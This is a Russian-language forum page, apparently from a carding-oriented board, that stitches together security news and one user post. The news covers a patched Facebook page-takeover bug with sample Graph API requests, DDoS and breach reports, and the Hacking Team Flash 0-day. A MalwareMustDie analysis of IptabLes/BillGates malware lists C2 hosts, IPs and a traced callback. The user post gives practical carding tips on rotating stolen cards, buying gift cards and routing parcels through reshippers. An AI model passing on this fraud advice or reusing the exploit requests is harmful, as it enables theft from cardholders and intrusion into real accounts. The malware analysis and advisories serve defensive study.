MARVIHER

Индийский специалист по безопасности Лаксман Мутиях (Laxman Muthiyah) неоднократно зарабатывал неплохие деньги на программах вознаграждения за найденные уязвимости. Мутиях дважды находил дыры в коде Facebook. Нашел он и третью. Баг позволяет взламывать так называемые Facebook business pages, то есть страницы компаний и различных сообществ. Ранее Мутиях уже находил уязвимость, позволявшую удалять чужие фотоальбомы, за что получил от социальной сети $12 500. Затем, буквально месяц спустя, он обнаружил брешь в Facebook Photo Sync feature и заработал еще $10 000. А теперь Мутиях нашел баг, при помощи которого можно взломать страницы, принадлежащие различным фирмам и сообществам, то есть страницы, которыми управляет не один пользователь. Мутиях рассказал в своем блоге, что сторонние приложения могут получить практически полный контроль над Facebook-страницей. В итоге, это может привести к тому, что жертва полностью утратит свои права администратора. Сторонним приложениям разрешено производить практически любые операции, в том числе, публиковать статусы от имени пользователя, публиковать фото, выполнять другие задачи, однако Facebook, казалось бы, не позволяет им добавлять кого-либо в список администраторов страницы или модифицировать его. Зато Facebook позволяет администраторам присваивать различные роли людям, состоящим в организации\группе, через manage_pages – специальное разрешение доступа, запрашиваемое сторонними приложениями. Из-за этого, по словам исследователя, атакующий, при помощи простой последовательности запросов, может сделать себя админом определенной страницы Facebook. Выглядеть это будет примерно так: POST /PGID/userpermissions HTTP/1.1 Host: graph.facebook.com Content-Length: 245 role=MANAGER&user=X&business=B&access_token=<application_access_token> В данном примере страница PGID принадлежит компании B. Используя запрос manage_pages, можно присвоить пользователю X статус MANAGER, то есть сделать его администратором данной страницы. Фактически, атакующий может получить полный контроль над аккаунтом. Чтобы удалить саму жертву из списка администраторов, тоже не потребуется много манипуляций: Delete /<page_id>/userpermissions HTTP/1.1 Host : graph.facebook.com Content-Length: 245 user=<target_user_id>&access_token=<application_access_token> Исследователь уже сообщил о проблеме в Facebook и получил причитающиеся ему $2500 вознаграждения. Социальная сеть, в свою очередь, отчиталась об устранении бага. Тем не менее, Мутиях рекомендует всем пользователям внимательно следить за тем, какой доступ и к чему именно они предоставляют сторонним приложениям.

Сайт Национального агентства по борьбе с преступностью Великобритании подвергся DDoS-атаке. Во вторник, 1 сентября, официальный сайт Национального агентства по борьбе с преступностью Великобритании (National Crime Agency, NCA) подвергся DDoS-атаке. Предположительно, инцидент является своего рода актом мести за арест шестерых пользователей, подозреваемых NCA в использовании инструмента Lizard Stresser, применяемого хакерской группировкой Lizard Squad. Похоже на то, что ресурс агентства стал жертвой злополучного инструмента. Так, утром 1 сентября на странице Lizard Squad в Twitter было опубликовано изображение ящерицы с надписью «stressed out». «Сайт NCA – привлекательная цель для атак, это суровая правда жизни. DDoS является примитивной формой атак, не требующей никаких навыков. Это не брешь в безопасности и никак не затрагивает наши оперативные возможности. В худшем случае атака доставила неудобства пользователям нашего сайта», – заявил пресс-секретарь агентства. Напомним, что на прошлой неделе сотрудники NCA арестовали шестерых человек по подозрению в использовании вредоносного инструмента Lizard Stresser, способного выводить из строя сайты на несколько часов.

База позволит проверить личность за считанные минуты С 1 сентября Украина станет полноценной частью международной системы розыска преступников. С этой даты в полную силу заработает новая система доступа к розыскным базам Интерпола для украинских силовиков. В первую очередь, благодаря этому ловить злоумышленников станет легче пограничникам: как объяснили "Сегодня" в Госпогранслужбе, преимущество новой системы в том, что теперь разыскиваемые Интерполом преступники будут задержаны пограничниками сразу при попытке пересечения украинской границы. "До 15 августа система работала по старинке: сотрудники МВД и прочих ведомств присылали нам бумажные ориентировки на того или иного гражданина-иностранца. Теперь такая информация доступна пограничникам в электронном варианте, поэтому проверить статус гражданина стало возможным за считанные минуты", — говорят пограничники. Неофициально они говорят, что хоть система пока и не дала ни единого сбоя (до 1 сентября она работает в тестовом режиме. — Авт.), но вычислить за эти дни не посчастливилось ни одного разыскиваемого Интерполом. Пока эта система начала свою работу лишь в аэропорту "Борисполь", в дальнейшем ею хотят оборудовать 21 пограничный пункт пропуска. Кроме того, как сообщили в пресс-службе Кабмина, 24 августа Украина вышла из баз розыска СНГ, потому как Москва не исполняет своих обязательств в рамках работы с этой базой (к примеру, не дает данных о разыскиваемых преступниках по запросу Украины. — Авт.). В связи с новшествами "Сегодня" выяснила, как сейчас разыскивают злоумышленников в разных странах мира. США: помогают анкеты граждан Система розыска и поимки преступников в Америке и Украине — это небо и земля, говорят эксперты. По крайней мере, так о двух моделях розыска отзывается ветеран и первый руководитель ГУБОП МВД Украины Валерий Кур: "Запад продвинулся намного дальше. Например, там нотариуса при оформлении сделки государство обязывает войти в закрытую систему, которая содержит информацию о том, представляет ли клиент опасность для государства, находится ли в розыске... Причем доступ к такой базе имеют не только нотариусы, но и все лица, имеющие отношение к госслужбе, включая тех, кто выдает номера для авто. В США не жалеют денег на техническое оснащение для розыска. Там есть даже специальная картотека на людей, начиная с их рождения. Все данные о человеке вносятся в государственную систему контроля: отпечатки пальцев, биологический состав крови, ДНК... Установка такая: если ты законопослушен, то эти меры смогут помочь тебе в беде — система не направлена против человека. Если же человек нарушил закон, то даже стесывание подушечек пальцев и изменение цвета роговицы глаза не поможет: человек никогда не сможет изменить свой состав крови и образцы волос". Европа: ищут со "спецжучками" "В Европе — очень закрытая система розыска. Они очень неохотно делятся своими технологиями или секретами работы. Например, когда-то они не захотели нам рассказать, как разыскивают угнанные авто. Мы считали, что такие машины качественно разыскиваем мы. А оказалось, что они еще при сборке автомобиля монтируют в него чип! Потом путь движения авто можно отследить с помощью спутника. Кроме того, есть и мобильные телефоны, за которыми возможно слежение, даже если он отключен и из него вытащена батарея", — говорит Валерий Кур. Также европейские силовики, вычисляя преступников, активно используют возможности технического прогресса и соцсети — ведь иногда злоумышленника удается поймать даже благодаря "лайкам"! "Однажды западная полиция едва ли не с ног сбилась, разыскивая опасного мошенника. Им помог случай: информацию о розыске человека в соцсетях "лайкнул" гражданин с именем и фамилией, идентичными ФИО разыскиваемого. Когда вычислили, с какого компьютера это было сделано, удалось выйти на него и поймать злоумышленника. Прогресс не стоит на месте, и мы тоже активно этим пользуемся. В соцсетях мы вычисляем место жительства преступников и определяем круг его знакомых", — рассказали нам действующие милиционеры. СНГ: засады и перехват И милиционеры, и эксперты нам рассказали, что система розыска в странах СНГ (сюда входили данные о всех разыскиваемых злоумышленниках в бывших союзных республиках, кроме Прибалтики. — Авт.) практически одинаковая с нашей. "Ориентировки на постах, план "Перехват", засады", — приводят пример милиционеры. А вот выход Украины из розыскных баз СНГ некоторые эксперты считают не самым удачным решением. "Это в большей мере политическое решение. Минус в том, что украинские силовики будут менее информированы о том, в розыске в СНГ тот или иной человек или нет. А последний ведь может заявить, что его задержали незаконно, мол, его данные не содержаться в базе, и милиции придется его отпустить. Проверять придется человека, как говорится, окольными путями. Хотелось бы, чтобы Украина работала со всеми базами. Неплохо было бы, чтобы страны СНГ вошли в мировую систему", — говорит Валерий Кур. А вот по словам главы МВД Арсена Авакова, МВД России, являющееся держателем банка данных, с 26 февраля 2014 года не внесло ни одного запроса по розыску преступников со стороны Украины. Министр считает это нарушением договора со стороны Российской Федерации. "Дальнейшие отношения по координации розыска преступников со странами — членами СНГ Украина будет вести в рамках независимой международной системы Интерпол, а не "ручной подметной" базы под контролем русского режима", — сообщал Аваков на своей странице в соцсети. http://www.segodnya.ua/criminal/ukra...la-644120.html

Приносим извинения за предоставленные неудобства! Возникали внутренние ошибки, все было исправлено! В дальнейшем форум будет работать в постоянном режиме и без перебоев!

Чиновники считают, что кибератака была организована специалистами из Китая. Хакеры в очередной раз совершили кибератаку на сервер одного из федеральных ведомств США и получили доступ к персональным данным сотрудников американской разведки и военных, которые те предоставили для получения доступа к секретной информации. Кроме личных данных в руки хакеров попали также списки контактов родственников военных, что, по мнению чиновников, может быть использовано для давления на них. По данным СМИ, всего в руки хакеров попали данные более чем 14 миллионов человек. Американские чиновники заявили, что кибератака была проведена с территории КНР. Напомним, ранее хакерам удалось получить доступ к персональным данным бывших и действующих чиновников федеральных ведомств США. Тогда кибератаке подверглись базы данных управления по персоналу федерального правительства. Отметим, что в этой атаке чиновники также подозревают китайских специалистов. Однако власти КНР полностью отрицают это.

Сегодня в России орудует свыше 20 тысяч профессиональных хакеров, а общий объем рынка киберпреступлений перевалил за 1 миллиард долларов в год. Такие шокирующие цифры были озвучены на пресс-конференции, посвященной информационной безопасности, пишут «Известия». По словам экспертов, в России сложились тепличные условия для виртуального криминала. Как утверждают специалисты, в нашей стране окончательно сформировался рынок профессиональных компьютерных преступлений с гигантским денежным оборотом. Услуги хакеров стали доступны любому человеку. - Мы проводили исследование теневого рынка и пришли к поразительным выводам, — поделился Илья Сачков, генеральный директор первой российской компании по расследованию киберпреступлений Group-IB. Эта компания недавно помогала Управлению «К» МВД в раскрытии банды, заразившей вирусами-блокираторами десятки тысяч компьютеров, — в российском интернете можно легко выйти на хакера-профи, который провернет любую аферу. Расценки смешные: взломать чужую почту или форум обойдется в 50 долларов, внедрение шпионских программ на компьютер — от 100 долларов, произвести DDos-атаку, которая выведет целый сайт из строя, выльется в 300-400 долларов. А заразить вирусом 1000 компьютеров вообще стоит 20 баксов. В той же Америке аналогичные услуги обойдутся раз в 5 дороже. Поэтому услуги пользуются спросом. К примеру, этим летом шла кибервойна между фирмами, устанавливающими кондиционеры. Компании вовсю нанимали хакеров, чтобы вывести из строя сайты конкурентов. Самые популярные сегодня преступления — это использование бот-сетей и DDos-атаки. Бот-сеть — это компьютерная сеть, состоящая из нескольких десятков, сотен или даже тысяч компьютеров обычных пользователей, зараженных вирусом. Человек может подхватить вирус, «кликнув» по зараженному баннеру на сайте, пройдя по подозрительной ссылке или скачав файл. После этого компьютер становится частью Сети, которой управляет хакер. Цель различная: начиная от рассылки спама с зараженных машин и заканчивая кражей виртуальных денег и паролей. Использующая бот-сети группа хакеров легко зарабатывает от 60 до 90 миллионов рублей в месяц. При этом киберпреступники не боятся угодить за решетку. - Главная причина расцвета киберпреступности в России — безнаказанность хакеров, — объяснил Илья Сачков. — Судьи мало понимают в киберпреступлениях, считая это детскими забавами, и дают условные сроки за многомиллионные аферы. Есть и лазейки в законах. К примеру, в одном из последних судебных дел преступник использовал следующий аргумент: я сидел в Сети через беспроводную связь, которая не была защищена паролем. А это значит, что любой мог подключиться к моей Сети и совершить это преступление. Или же пойманный хакер уверяет, что в день совершения преступления у него дома была куча гостей, в том числе незнакомые люди. Дескать, кто-то из них сел за компьютер и совершил взлом. Доказать виновность в таких случаях очень тяжело. По мнению экспертов, необходимо разъяснить судьям, что киберпреступность — не игрушки, а серьезная проблема, наносящая гигантский ущерб гражданам и государству.

Прочтите правила для получения статуса!

Сегодня мы опубликовали сведения о новой очень опасной уязвимости в Adobe Flash Player (Hacking Team RCE Flash Player 0day), которая может использоваться атакующими для удаленного исполнения кода и установки вредоносных программ на всех популярных браузерах, включая, MS IE, MS Edge (Windows 10), Google Chrome, Opera, Mozilla Firefox, причем, эксплойт поддерживает также и ОС Apple OS X. Тогда же мы указали, что злоумышленники смогут воспользоваться этой уязвимостью в своих целях. Наши прогнозы оправдались в полной мере, авторы самых распространенных наборов эксплойтов уже добавили его в свой арсенал и используют для проведения атак drive-by download. Вчера компания Adobe выпустила уведомление безопасности <a href="https://helpx.adobe.com/security/products/flash-player/apsa15-03.html">APSA15-03, в котором указывается, что уязвимости присвоен идентификатор CVE-2015-5119 и она затрагивает Flash Player на платформах Windows, Linux и OS X. Также Adobe указала дату выхода исправления — 8 июля, т. е. сегодня. Наши антивирусные продукты обнаруживают эксплойт для этой уязвимости как SWF/Exploit.Agent.IG и SWF/Exploit.ExKit.AX. Действие эксплойта также может быть заблокировано с использованием EMET, о котором мы неоднократно писали ранее. Эксплойт для CVE-2015-5119 был добавлен, как минимум, в такие наборы эксплойтов как Angler, Neutrino и Nuclear Pack. По данным исследователя набора эксплойтов kafeine, они распространяют различные модификации эксплойта со следующими идентификаторами. SHA256: aff5d2b970882786538199553112edbfe6f14e945374aa88cac6d34bec8760ca www.virustotal.com/ru/file/aff5d2b970882786538199553112edbfe6f14e945374aa88cac6d34bec8760ca/analysis/1436307118 SHA256: 4464720e2a849f42c7ed827901330bb2fa7d219c22e57d96db894013810705d8 www.virustotal.com/ru/file/4464720e2a849f42c7ed827901330bb2fa7d219c22e57d96db894013810705d8/analysis/1436309989 SHA256: 7b7141d59d4e07f7f958acac137ccfec105d046732de65e128a07bbf5f0a0baa www.virustotal.com/ru/file/7b7141d59d4e07f7f958acac137ccfec105d046732de65e128a07bbf5f0a0baa/analysis/1436310916 Нужно отметить, что по сети уже начала гулять работоспособная версия 0day LPE эксплойта для up-to-date версии Windows 8.1 (atmfd.dll) (архив Hacking Team), которая может использоваться злоумышленниками для повышения привилегий во вредоносных программах или для обхода sandbox в IE. Мы настоятельно рекомендуем пользователям отключить Flash Player для используемого браузера до выхода исправления со стороны Adobe. Инструкции по этому процессу можно найти здесь. UPD: Уязвимость закрыта обновлением APSB15-16. helpx.adobe.com/security/products/flash-player/apsb15-16.html

Наверное многие слыхали про утечку конфиденциальных данных кибергруппы Hacking Team, которая подверглась масштабному взлому. В архиве находились исходные тексты нескольких 0day эксплойтов, в т. ч. LPE sandbox-escape эксплойт для веб-браузера Internet Explorer и опасный RCE+LPE эксплойт для актуальной версии Flash Player. Рабочая версия последнего уже гуляет по сети и представляет для пользователей очень большую опасность, поскольку эксплойт является универсальным и позволяет удаленно исполнять код сразу в нескольких браузерах (актуальные версии), включая, Google Chrome, Opera, MS Internet Explorer, и, даже, MS Edge в составе Windows 10. Рис. Исходные тексты эксплойта. Рис. Демонстрация <a href="https://twitter.com/SecObscurity/status/618187193983586304">успешности работы эксплойта для веб-браузера Opera на 32-битной версии Windows 7. Рис. То же самое для Google Chrome. Источник здесь. Рис. Эксплойт также прекрасно работает на новейшем веб-браузере MS Edge на Windows 10 (build 10162). Рис. Эксплойт прекрасно работает для IE11 на 64-битной up-to-date версии Windows 7 с включенным EPM. В данном случае наиболее опасное развитие ситуации будет заключаться в том, что этот эксплойт может попасть в состав одного или нескольких наборов эксплойтов и будет использован злоумышленниками для организации drive-by атак с автоматической установкой вредоносных программ. Мы рекомендуем пользователям отключить Flash Player для используемого вами браузера до выхода соответствующего исправления со стороны Adobe. Инструкции по этому процессу можно найти здесь. UPD: Компания Symantec также подтвердила актуальность этого 0day эксплойта. Leaked Flash zero day likely to be exploited by attackers www.symantec.com/connect/blogs/leaked-flash-zero-day-likely-be-exploited-attackers Пользователи могут использовать EMET для блокирования активности этого эксплойта. www.kb.cert.org/vuls/id/561288 UPD1: Уязвимости присвоен идентификатор CVE-2015-5119 (Windows, Linux, OS X). См. Security Advisory for Adobe Flash Player (APSA15-03) helpx.adobe.com/security/products/flash-player/apsa15-03.html UPD2: Антивирусные продукты ESET обнаруживают эксплойт как SWF/Exploit.Agent.IG. virusradar.com/en/update/info/11902

1. Так всё верно, но надо брать разные СС ( если умрет сс при покупке нового гифта - то и пак тебе по первому гифту не вышлют) 2. Если вбивать гифты и слать на посреда будешь сразу ( в течении 3 дней с момента первой покупки), то шли на 1 посреда до момента погрузки товара на 1-2к$, чтобы сразу выслать на Родину. Можно на один сьют. Если хочешь обезопасить себя от лока всех посылок - то надо вбивать на разных посредников( а не просто менять акки в одном) 3. Выгружай по 500 и не прыгай в суммах, толкну от этого мало. Шоп товар может отослать и через 5 дней после ордера, зависит от их службы доставки/наличия товара. В любом случае, ты за 1 день не запакуешь товар и не вышлешь на Родину. Это занимает 2 дня

Внимание всем!Появился новый статус VIP. Назначает стаутус Администрация.Получат те кто внес на благо форума,кто ведет активную жизнь.Так же создан отдельный раздел,где vip пользователи будут общаться,обсуждать схемы,и делиться приват статьями. Для получения статуса скидывайте свои заявки Администрации,после рассмотрения и одобрения вы получаете доступ!

Вредонос .IptabLex & .IptabLes ELF DDoS malware создан криминальной группировкой China DDoSer и прекрасно себя чувствует на самых различных архитектурах на базе ОС Linux. Троян, появившийся в 2014 году, нацелен на Linux-системы с низким уровнем безопасности и распространяется через уязвимость в протоколе SSH . Так уж сложилось, что впервые вредонос был обнаружен нашей группой (MalwareMustDie) в мае 2014 года и получил имя Linux .Iptablesx|s. На эту тему 15-го июня 2014 года мы выпустили специальную заметку MMD-0025-2014. Поскольку в то время инфекция распространялась настолько быстро, а информации было настолько мало, что 4-го сентября 2014 года нами был создан специальный репозиторий, где выкладывались образцы вредоносов и другие полезные сведения, чтобы сдержать скорость распространения и повысить осведомленность индустрии. В 2014 году троян .IptableS|X поучаствовал в огромном количестве DDoS-атак и в сентябре 2014 года был удостоен вниманием таких уважаемых организаций как Prolexic (ссылка) и Akamai (ссылка). Последняя ссылалась на бюллетень, выпущенный компанией Prolexic. До октября 2014 года вредонос .IptableS / .IptablesX все еще погуливал в дикой природе, но с ноября был вытеснен другими экземплярами троянов от китайских производителей, которые мы также успешно отлавливали. В январе 2015 года мы полагали, что развитие популяции .IptabLes|x полностью прекратилось. Однако 27-го июня 2015 года мой друг @TinkerSec через твиттер рассказал мне о своем подозрении на появление заразы Linux/ChinaZ, после чего состоялась наша душещипательная беседа и анализ находки. Затем член нашей команды обнаружил полезную нагрузку, очень похожую на ранее обнародованные образцы и распространяемую посредством уязвимости shellshock. Я копнул немного поглубже и с удивлением обнаружил, что имею дело с вариацией вредоноса Linux IptableS /.IptablesX. Несколько раз перепроверив свои догадки и разобравшись, почему вначале мне показалось, что я имею дело с вредоносом Linux/ChinaZ, я написал заметку о возобновлении угрозы 2014 года, связанной с DDoS атаками вредоноса IptableS|X. Детали ниже. Shellshock, ChinaZ, .IptabLes|x и BillGates В этом отчете не будет подробного технического анализа образцов вредоноса, поскольку я уже делал это раньше (образцы опубликованы на kernelmode и VirusTotal). Я расскажу о схеме заражения, чтобы прояснить, в чем конкретно заключается угроза. Кроме того, я приведу некоторую информацию, которая может помочь правоохранительным органам добраться до злоумышленников, стоящих за этими атаками. В разное время я получил два независимых отчета о двух случаях атаки при помощи уязвимости shellshock. Еще раз спасибо @tinkersec и @benkow. Рисунок 1: Две попытки атаки через уязвимость shellshock Для более удобного восприятия немного причешем код (мы же не какие-то жулики, а вполне приличные люди). В командах, приведенных выше, есть довольно много знакомых признаков: Рисунок 2: Структурированная версия инфицированной команды В коде указан IP-адрес злоумышленников. В обоих случаях атаки осуществлялись с IP-адреса 58.213.123.107. Сама структура кода довольно типична, когда через User-agent() выполняются команды bash, а прямые GET-команды содержат строки, используемые при эксплуатации уязвимости shellshock. Кроме того, из кода видно, что нехорошие ребята из ChinaZ, кажется, пытаются впарить нам свою полезную нагрузку. Идем дальше. Обе атаки произошли на разных континентах и в разное время (26-го июня и 30-го июня) у двух незнакомых друг с другом людей, однако используемая полезная нагрузка в формате ELF была идентичной. Рисунок 3: Контрольные суммы полезных нагрузок Довольно странно то, что в течение 3 дней полезная нагрузка сохраняла ту же самую контрольную сумму, поскольку в распоряжении создателей вредоноса Linux/ChinaZ находятся исходные тексты и инструменты для сборки. А теперь посмотрите, что еще я нашел в том образце полезной нагрузки: Рисунок 4: Сигнатуры вредоноса Linux/.IptableS|X На рисунке выше показаны сигнатуры вредоноса Linux/.IptableS|X. В исходном коде вредоноса ChinaZ отсутствуют интерактивные команды остановки и перезагрузки IptabLes|x. Смотрите, как кодер пытается сокрыть эти команды внутри настоящей связки команд для остановки сервиса iptables (обратите внимание на разные символы в конце). Это вполне согласуется с наличием команды closefirewall(), предназначенной для остановки службы iptables на компьютере жертвы, чтобы потом можно было заразить систему вредоносом IptabLes|x: Рисунок 5: Содержимое команды closefirewall() Наконец-то многое прояснилось. Но почему злоумышленники так поступили? Почему используется IptabLes|x? Возможны две версии. Либо ребята из ChinaZ начали активно распространять свою первоначальную полезную нагрузку (потому что мы провели глубокий реверс-инжиниринг и опубликовали результаты), либо кто-то пытается от имени ChinaZ распространять вредонос IptablesS|X. Ну, хорошо. Давайте копнем чуть глубже и исследуем панель, используемую в качестве источника заражения. Рисунок 6: Место хранения полезных нагрузок На IP-адресе 202.103.243.104 висит китайская версия модифицированного веб-сервера HFS (хороший и легитимный веб-сервер, который я постоянно использую в своей работе). На сервере хранятся 32- и 64-х битные версии вредоноса Iptables|X, а также вредонос Linux/BillGates ELF DDoS. Обратите внимание на огромное количество (более 4000) загрузок 32-х битной версии, что говорит об эффективности распространения заразы при помощи уязвимости shellshock. На IP-адресе злоумышленника висит бот, пытающийся заразить все возможные сервера на базе ОС Linux. Ниже представлена информация об IP-адресе: 58.213.123.107||4134 | 58.208.0.0/12 | CHINANET | CN | chinatelecom.com.cn ChinaNet Jiangsu Province Network { "ip": "58.213.123.107", "hostname": "No Hostname", "city": "Nanjing", "region": "Jiangsu", "country": "CN", "loc": "32.0617,118.7778", "org": "AS4134 No.31,Jin-rong Street" } Необходимо в кратчайшие сроки остановить атаки с этого IP-адреса. Информация об IP-адресе, на котором находятся полезные нагрузки: 202.103.243.104||4134 | 202.103.192.0/18 | CHINANET | CN | chinatelecom.com.cn ChinaNet Guangxi Province Network { "ip": "202.103.243.104", "hostname": "bbs.gliet.edu.cn", "city": "Guilin", "region": "Guangxi", "country": "CN", "loc": "25.2819,110.2864", "org": "AS4134 No.31,Jin-rong Street" } Оба IP-адреса принадлежат одной и той же организации (AS4134 No.31,Jin-rong Street). Ниже показан домен, на котором висит панель. Это может быть взломанный сервер какого-то образовательного учреждения, либо просто взломанный домен. Рисунок 7: Домен, на котором висит панель с полезными нагрузками Анализ вредоноса Проделанный мной ранее технический анализ во время беседы с @TinkerSec в твиттере полностью корректен, и больше мне добавить нечего. Приведу лишь информацию об управляющем сервере: "domain: v8.f1122.org IP: 61.160.212.172 port 1122 " Информация о сервере получена в ходе исследования вредоноса: Рисунок 8: Информация об управляющем сервере Детальная информация о домене и IP-адресе управляющего сервера Информация об IP-адресе: 61.160.212.172| - |23650 | 61.160.212.0/24 | CHINANET-JS-AS | CN | chinatelecom.com.cn ChinaNet Jiangsu Province Network { "ip": "61.160.212.172", "hostname": "v8.f1122.org", "city": "Nanjing", "region": "Jiangsu", "country": "CN", "loc": "32.0617,118.7778", "org": "AS23650 AS Number for CHINANET jiangsu province backbone" } Информация о регистрации домена (похоже, что на данный момент домен заблокирован): "Domain Name:F1122.ORG Domain ID: D174941520-LROR Creation Date: 2015-01-03T06:46:16Z Updated Date: 2015-03-05T03:45:24Z Registry Expiry Date: 2016-01-03T06:46:16Z Sponsoring Registrar:GoDaddy.com, LLC (R91-LROR)" Sponsoring Registrar IANA ID: 146 WHOIS Server: Referral URL: Domain Status: clientDeleteProhibited -- http://www.icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited -- http://www.icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited -- http://www.icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited -- http://www.icann.org/epp#clientUpdateProhibited Registrant "ID:CR184376377" Registrant "Name:xihuang li" Registrant Organization: Registrant "Street: shanxishengdatongshibeijie23hao" Registrant "City:shanxishengdatongshi" Registrant "State/Province:shanxisheng" Registrant Postal Code:037000 Registrant Country:CN Registrant "Phone:+86.3522036283" Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant "Email:wendingba@163.com" Электронная почта WENDINGBA@163.COM связана с именем Xihuang Li и пятью другими именами. Общее количество найденных доменов – 1382, большинство из которых зарегистрированы в GoDaddy и ENOM. Ниже показана информация о 20 первых доменах. Рисунок 9: Информация о некоторых доменах, используемых злоумышленниками Вредонос Linux/BillGates ничем не отличается от остальных (можете посмотреть другие наши статьи по этой теме). Ниже показана информация об управляющем сервере: Domain: udp.f1122.org IP: 61.160.213.18 Port: 25001 Обратный вызов к управляющему серверу для загрузки конфигурационного файла: socket(PF_INET, SOCK_STREAM, IPPROTO_IP sendto(5, "W\204\1\0\0\1\0\0\0\0\0\0\3udp\5f1122\3org\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS")}, 16) recvfrom(5, "W\204\201\200\0\1\0\1\0\2\0\n\3udp\5f1122\3org\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS")}, [16]) connect(4, {sa_family=AF_INET, sin_port=htons(25001), sin_addr=inet_addr("61.160.213.18")}, 16) open("/XXXX/conf.n", O_RDWR|O_CREAT, 0644) write(5, "\0\364\1\0\0002\0\0\0\350\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\1\2\0\0\0"..., 69) close(5) Факт установления соединения вредоноса и управляющего сервера: $ date Wed Jul 1 15:25:44 JST 2015 (snips) 28443 28453 txt REG 8,6 1223123 1048605 /sudp 28443 28453 0u CHR 1,3 0t0 1192 /dev/null 28443 28453 1u CHR 1,3 0t0 1192 /dev/null 28443 28453 2u CHR 1,3 0t0 1192 /dev/null 28443 28453 3uW REG 8,1 5 261598 /tmp/gates.lod 28443 28453 4u "IPv4 127246603 0t0 TCP MMD:32977->61.160.213.18:25001 (ESTABLISHED)" Информация о DNS для IP-адреса, указанного выше: ;; QUESTION SECTION: ;udp.f1122.org. IN A ;; ANSWER SECTION: udp.f1122.org. 600 IN A 61.160.213.18 ;; AUTHORITY SECTION: f1122.org. 600 IN NS f1g1ns1.dnspod.net. f1122.org. 600 IN NS f1g1ns2.dnspod.net. ;; ADDITIONAL SECTION: f1g1ns1.dnspod.net. 350 IN A 113.108.80.138 f1g1ns1.dnspod.net. 350 IN A 125.39.208.193 f1g1ns1.dnspod.net. 350 IN A 180.153.9.189 f1g1ns1.dnspod.net. 350 IN A 182.140.167.166 f1g1ns1.dnspod.net. 350 IN A 111.30.132.180 f1g1ns2.dnspod.net. 1015 IN A 115.236.137.40 f1g1ns2.dnspod.net. 1015 IN A 115.236.151.191 f1g1ns2.dnspod.net. 1015 IN A 182.140.167.188 f1g1ns2.dnspod.net. 1015 IN A 101.226.30.224 f1g1ns2.dnspod.net. 1015 IN A 112.90.82.194 Информация об IP-адресе: 61.160.213.18| - |23650 | 61.160.213.0/24 | CHINANET-JS-AS | CN | chinatelecom.com.cn ChinaNet Jiangsu Province Network { "ip": "61.160.213.18", "hostname": "udp.f1122.org", "city": "Nanjing", "region": "Jiangsu", "country": "CN", "loc": "32.0617,118.7778", "org": "AS23650 AS Number for CHINANET jiangsu province backbone" } Как и предполагалось, вредонос Linux/BillGates использует тот же самый домен (f1122.org), а IP-адрес находится в той же самой сети, что и управляющий сервер вредоноса IptableS|X. Очевидно, что обоими серверами управляют одни и те же лица. После того как я подсоединился к серверу, соединение тут же было закрыто. В предыдущем отчете о вредоносе ChinaZ мы выяснили, что управляющий сервер был зарегистрирован на электронную почту bm18801463268@163.com. В этот раз использовался адрес wendingba@163.com. Я уверен, что за обоими вредоносами стоят одни и те же люди. Мы связались с администратором домена 163.com, но полученная информация будет сообщена только правоохранительным органам. Доказательства того, что сервер 58.221.254.153 принадлежит ChinaZ Наша команда также нашла подтверждение тому, что IP-адрес 58.221.254.153 связан с вредоносом ChinaZ. Там хранится сборщик ChinaZ (win-приложение), в котором содержится код ChinaZ и код управляющего сервера для ChinaZ. Доказательство #1: сборщик ChinaZ: --> [результаты сканирования Virus Total] Рисунок 10: Содержимое архива сборщика Если запустить сборщик, во вложенных папках начнется поиск бинарных шаблонов под формат ELF (x32 / x64), либо win (x32). Затем появится диалоговое окно с возможностью сборки пакета под нужный IP-адрес. Номер порта фиксированный (29136). В шаблонах используется шифрование, что не позволяет изменить номер порта. Именно поэтому мы понимаем, что злоумышленник – не программист, а простой исполнитель. Рисунок 11: Диалоговое окно сборщика Анализ кода показал, что сборщик работает и не вредит системе. Из-за загруженности на работе я не стал сильно углубляться в детали. Ниже показаны пути, где сборщик ищет шаблоны для компиляции вредоноса. Если путь не найдется, сборщик работать не будет. Рисунок 12: Пути, где сборщик ищет шаблоны Доказательство #2: внутри шаблона используется код ChinaZ: -->[VT] и [VT] Я взял шаблон (ELF x32) «\\Arch32\\DDosClientTemp32», чтобы проверить, присутствует ли там код ChinaZ. В прошлой статье о ChinaZ был выявлен аккаунт на GitHub, который использовался для разработки вредоноса. Наш друг @benkow посоветовал посмотреть соответствия в исходниках и в бинарном файле полезной нагрузки. Ниже показаны некоторые функции и переменные, используемые вредоносом: Рисунок 13: Часть исходного кода вредоноса ChinaZ Некоторые участки исходного кода полностью совпадают со строками в бинарном файле \\Arch32\\DDosClientTemp32 Рисунок 14: Часть строк в бинарном шаблоне совпадает с исходным кодом ChinaZ Доказательство #3: управляющий сервер для ChinaZ -->[VT] В том же архиве был найден софт и лог управляющего сервера: Рисунок 15: Перечень файлов, имеющих отношение к управляющему серверу После запуска исполняемого файла сервер будет ожидать подключения вредоносов на определенном порту: Рисунок 16: Интерфейс управляющего сервера После всех доказательств, приведенных выше, не остается сомнений, что хост 58.221.254.153, при помощи которого заражаются Linux-системы через уязвимость shellshock, имеет прямое отношение людям, использующим ChinaZ. Соответственно, вся информация, имеющая отношение к IP-адресам и серверам, имеет прямое отношение к злоумышленникам. Образцы полезных нагрузок и результаты сканирования в Virus Total Ниже показаны различные версии полезных нагрузок и результаты сканирования в сервисе Virus Total: 1122.32.ELF.IptableX.DDoS 58eefd9183ac89a1b99dda02e0ab4092 1122.64.ELF.IptableX.DDoS 8d18ddc23603726181ebb77931aa11f3 sudp.Elf.BillGates.DDoS 84d431618cbbbf56fe0cc3d34f62a655

